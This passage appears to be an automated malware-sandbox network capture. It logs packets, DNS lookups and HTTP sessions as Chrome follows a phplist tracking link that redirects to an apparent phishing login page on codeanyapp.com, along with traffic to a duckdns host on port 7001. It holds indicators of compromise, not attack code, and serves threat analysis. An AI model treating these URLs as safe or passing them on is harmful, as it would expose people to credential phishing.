                                                                                                    Jan 2, 2025 09:50:10.180686951 CET700149770102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:50:13.650486946 CET44349769198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:13.650567055 CET44349769198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:13.650623083 CET49769443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:14.242710114 CET49769443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:14.242746115 CET44349769198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:16.916888952 CET49771443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:16.916934013 CET44349771198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:16.917016029 CET49771443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:16.917937994 CET49771443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:16.917953968 CET44349771198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:16.924329042 CET49772443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:16.924357891 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:16.924422979 CET49772443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:16.924978971 CET49772443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:16.924992085 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:17.681157112 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:17.681529999 CET49772443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:17.681545973 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:17.681876898 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:17.682183027 CET49772443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:17.682240963 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:17.682328939 CET49772443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:17.683784962 CET44349771198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:17.683969975 CET49771443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:17.683988094 CET44349771198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:17.684325933 CET44349771198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:17.684592962 CET49771443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:17.684660912 CET44349771198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:17.724236012 CET49771443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:17.727333069 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.032949924 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.032977104 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.033014059 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.033078909 CET49772443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:18.033104897 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.033149958 CET49772443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:18.079718113 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.079808950 CET49772443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:18.079817057 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.079839945 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.079881907 CET49772443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:18.080214977 CET49772443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:18.080228090 CET44349772198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.087310076 CET497737001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:50:18.092109919 CET700149773102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.092195988 CET497737001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:50:18.092423916 CET497737001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:50:18.097596884 CET700149773102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.622757912 CET700149773102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.623464108 CET497737001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:50:18.623606920 CET497737001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:50:18.628324032 CET700149773102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.628381014 CET700149773102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.756999969 CET700149773102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.759805918 CET700149773102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.759840965 CET700149773102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:50:18.759885073 CET497737001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:50:18.759897947 CET497737001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:50:18.760667086 CET497737001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:50:18.765398026 CET700149773102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:50:22.423109055 CET44349771198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:22.423187971 CET44349771198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:22.423245907 CET49771443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:23.135582924 CET49771443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:50:23.135612965 CET44349771198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:50:39.272867918 CET49741443192.168.2.445.33.29.14
                                                                                                    Jan 2, 2025 09:50:39.272897959 CET4434974145.33.29.14192.168.2.4
                                                                                                    Jan 2, 2025 09:50:52.304594994 CET49835443192.168.2.4142.250.184.228
                                                                                                    Jan 2, 2025 09:50:52.304624081 CET44349835142.250.184.228192.168.2.4
                                                                                                    Jan 2, 2025 09:50:52.304691076 CET49835443192.168.2.4142.250.184.228
                                                                                                    Jan 2, 2025 09:50:52.304989100 CET49835443192.168.2.4142.250.184.228
                                                                                                    Jan 2, 2025 09:50:52.305001020 CET44349835142.250.184.228192.168.2.4
                                                                                                    Jan 2, 2025 09:50:52.933501959 CET44349835142.250.184.228192.168.2.4
                                                                                                    Jan 2, 2025 09:50:52.933815956 CET49835443192.168.2.4142.250.184.228
                                                                                                    Jan 2, 2025 09:50:52.933829069 CET44349835142.250.184.228192.168.2.4
                                                                                                    Jan 2, 2025 09:50:52.934286118 CET44349835142.250.184.228192.168.2.4
                                                                                                    Jan 2, 2025 09:50:52.934597969 CET49835443192.168.2.4142.250.184.228
                                                                                                    Jan 2, 2025 09:50:52.934674978 CET44349835142.250.184.228192.168.2.4
                                                                                                    Jan 2, 2025 09:50:52.975568056 CET49835443192.168.2.4142.250.184.228
                                                                                                    Jan 2, 2025 09:50:54.243931055 CET49741443192.168.2.445.33.29.14
                                                                                                    Jan 2, 2025 09:50:54.244025946 CET4434974145.33.29.14192.168.2.4
                                                                                                    Jan 2, 2025 09:50:54.244096041 CET49741443192.168.2.445.33.29.14
                                                                                                    Jan 2, 2025 09:51:02.842602015 CET44349835142.250.184.228192.168.2.4
                                                                                                    Jan 2, 2025 09:51:02.842761040 CET44349835142.250.184.228192.168.2.4
                                                                                                    Jan 2, 2025 09:51:02.842818022 CET49835443192.168.2.4142.250.184.228
                                                                                                    Jan 2, 2025 09:51:04.253051996 CET49835443192.168.2.4142.250.184.228
                                                                                                    Jan 2, 2025 09:51:04.253067970 CET44349835142.250.184.228192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.093548059 CET49914443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.093569994 CET44349914198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.093646049 CET49914443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.096165895 CET49914443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.096179008 CET44349914198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.096580029 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.096599102 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.096654892 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.097273111 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.097284079 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.851669073 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.852251053 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.852262020 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.852737904 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.853260994 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.853343010 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.853344917 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.866384983 CET44349914198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.866712093 CET49914443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.866729021 CET44349914198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.867183924 CET44349914198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.867495060 CET49914443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.867573977 CET44349914198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.895330906 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:05.896380901 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:05.911710978 CET49914443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:06.212677956 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.212740898 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.212778091 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.212805033 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:06.212814093 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.212843895 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.212852001 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:06.212893963 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:06.259797096 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.259926081 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:06.259938002 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.260071993 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.260134935 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:06.260313988 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:06.260323048 CET44349915198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.260343075 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:06.260369062 CET49915443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:06.415565014 CET499237001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:51:06.420322895 CET700149923102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.420384884 CET499237001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:51:06.420628071 CET499237001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:51:06.425401926 CET700149923102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.969360113 CET700149923102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.969377995 CET700149923102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.969512939 CET499237001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:51:06.969997883 CET499237001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:51:06.970158100 CET499237001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:51:06.974848032 CET700149923102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.974910975 CET700149923102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:51:07.107018948 CET700149923102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:51:07.150207043 CET700149923102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:51:07.150249004 CET700149923102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:51:07.150264978 CET499237001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:51:07.150279999 CET499237001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:51:07.150892019 CET499237001192.168.2.4102.165.14.26
                                                                                                    Jan 2, 2025 09:51:07.155622959 CET700149923102.165.14.26192.168.2.4
                                                                                                    Jan 2, 2025 09:51:10.610140085 CET44349914198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:10.610322952 CET44349914198.199.109.95192.168.2.4
                                                                                                    Jan 2, 2025 09:51:10.610373974 CET49914443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:11.316509962 CET49914443192.168.2.4198.199.109.95
                                                                                                    Jan 2, 2025 09:51:11.316533089 CET44349914198.199.109.95192.168.2.4
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 2, 2025 09:49:47.995944977 CET53610401.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:49:48.067218065 CET53516811.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:49:49.194899082 CET53596541.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:49:52.243129015 CET6369553192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:49:52.243287086 CET5235453192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:49:52.249901056 CET53523541.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:49:52.250236988 CET53636951.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:49:53.164906979 CET6235553192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:49:53.165286064 CET6061953192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:49:53.220473051 CET53606191.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:49:53.646819115 CET53623551.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:49:54.509653091 CET5046153192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:49:54.509653091 CET5483753192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:49:54.526438951 CET53548371.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:49:54.526801109 CET53504611.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:49:59.451364040 CET5217953192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:49:59.451678038 CET6337653192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:49:59.468230009 CET53521791.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:49:59.468708038 CET53633761.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:50:00.043454885 CET5352553192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:50:00.044215918 CET5227153192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:50:00.059556961 CET53552051.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:50:00.180278063 CET53535251.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:50:00.275500059 CET53522711.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:50:06.207483053 CET53594931.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:50:06.763057947 CET138138192.168.2.4192.168.2.255
                                                                                                    Jan 2, 2025 09:50:25.016503096 CET53653561.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:50:47.472595930 CET53501791.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:50:47.922420025 CET53534101.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.268651009 CET6283153192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:51:06.268820047 CET4962253192.168.2.41.1.1.1
                                                                                                    Jan 2, 2025 09:51:06.384763956 CET53628311.1.1.1192.168.2.4
                                                                                                    Jan 2, 2025 09:51:06.509493113 CET53496221.1.1.1192.168.2.4
                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                    Jan 2, 2025 09:50:00.275559902 CET192.168.2.41.1.1.1c1f9(Port unreachable)Destination Unreachable
                                                                                                    Jan 2, 2025 09:51:06.509579897 CET192.168.2.41.1.1.1c1f9(Port unreachable)Destination Unreachable
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Jan 2, 2025 09:49:52.243129015 CET192.168.2.41.1.1.10x9bfStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:52.243287086 CET192.168.2.41.1.1.10x7802Standard query (0)www.google.com65IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:53.164906979 CET192.168.2.41.1.1.10x4f42Standard query (0)sdazraf.hosted.phplist.comA (IP address)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:53.165286064 CET192.168.2.41.1.1.10x66e7Standard query (0)sdazraf.hosted.phplist.com65IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:54.509653091 CET192.168.2.41.1.1.10xcc0aStandard query (0)spoty-omsave0558101.codeanyapp.comA (IP address)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:54.509653091 CET192.168.2.41.1.1.10x871eStandard query (0)spoty-omsave0558101.codeanyapp.com65IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:59.451364040 CET192.168.2.41.1.1.10xf61Standard query (0)spoty-omsave0558101.codeanyapp.comA (IP address)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:59.451678038 CET192.168.2.41.1.1.10x2db2Standard query (0)spoty-omsave0558101.codeanyapp.com65IN (0x0001)false
                                                                                                    Jan 2, 2025 09:50:00.043454885 CET192.168.2.41.1.1.10x125dStandard query (0)chacktgbot.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:50:00.044215918 CET192.168.2.41.1.1.10xb889Standard query (0)_7001._https.chacktgbot.duckdns.org65IN (0x0001)false
                                                                                                    Jan 2, 2025 09:51:06.268651009 CET192.168.2.41.1.1.10x60a9Standard query (0)chacktgbot.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:51:06.268820047 CET192.168.2.41.1.1.10xb6d1Standard query (0)_7001._https.chacktgbot.duckdns.org65IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Jan 2, 2025 09:49:52.249901056 CET1.1.1.1192.168.2.40x7802No error (0)www.google.com65IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:52.250236988 CET1.1.1.1192.168.2.40x9bfNo error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:53.220473051 CET1.1.1.1192.168.2.40x66e7No error (0)sdazraf.hosted.phplist.comaspen.phplist.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:53.646819115 CET1.1.1.1192.168.2.40x4f42No error (0)sdazraf.hosted.phplist.comaspen.phplist.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:53.646819115 CET1.1.1.1192.168.2.40x4f42No error (0)aspen.phplist.com45.33.29.14A (IP address)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:54.526801109 CET1.1.1.1192.168.2.40xcc0aNo error (0)spoty-omsave0558101.codeanyapp.com198.199.109.95A (IP address)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:49:59.468230009 CET1.1.1.1192.168.2.40xf61No error (0)spoty-omsave0558101.codeanyapp.com198.199.109.95A (IP address)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:50:00.180278063 CET1.1.1.1192.168.2.40x125dNo error (0)chacktgbot.duckdns.org102.165.14.26A (IP address)IN (0x0001)false
                                                                                                    Jan 2, 2025 09:51:06.384763956 CET1.1.1.1192.168.2.40x60a9No error (0)chacktgbot.duckdns.org102.165.14.26A (IP address)IN (0x0001)false
                                                                                                    • sdazraf.hosted.phplist.com
                                                                                                    • spoty-omsave0558101.codeanyapp.com
                                                                                                    • https:
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.44974245.33.29.144432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:49:54 UTC836OUTGET /lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg HTTP/1.1
                                                                                                    Host: sdazraf.hosted.phplist.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-User: ?1
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:49:54 UTC549INHTTP/1.1 303 See Other
                                                                                                    date: Thu, 02 Jan 2025 08:49:54 GMT
                                                                                                    server: Apache/2.4.59 (Debian)
                                                                                                    set-cookie: WebblerSession=tsa9l96ud6itmdmmttes5jtp99; path=/; domain=phplist.com; secure; HttpOnly; SameSite=Strict
                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                    pragma: no-cache
                                                                                                    location: https://spoty-omsave0558101.codeanyapp.com/army/army
                                                                                                    content-length: 0
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    set-cookie: SERVERID=pqserver3|Z3ZTN|Z3ZTN; path=/; HttpOnly; Secure; SameSite=Lax
                                                                                                    connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449743198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:49:55 UTC686OUTGET /army/army HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-User: ?1
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:49:55 UTC240INHTTP/1.1 301 Moved Permanently
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:17 GMT
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    Content-Length: 362
                                                                                                    Connection: close
                                                                                                    Location: https://spoty-omsave0558101.codeanyapp.com/army/army/
                                                                                                    2025-01-02 08:49:55 UTC362INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 70 6f 74 79 2d 6f 6d 73 61 76 65 30 35 35 38 31 30 31 2e 63 6f 64 65 61 6e 79 61 70 70 2e 63 6f 6d 2f 61 72 6d 79 2f 61 72 6d 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://spoty-omsave0558101.codeanyapp.com/army/army/">here</a>.</p><hr><add


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.449744198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:49:56 UTC687OUTGET /army/army/ HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-User: ?1
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:49:56 UTC182INHTTP/1.1 302 Found
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    location: auth/login.php


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.449745198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:49:57 UTC701OUTGET /army/army/auth/login.php HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-User: ?1
                                                                                                    Sec-Fetch-Dest: document
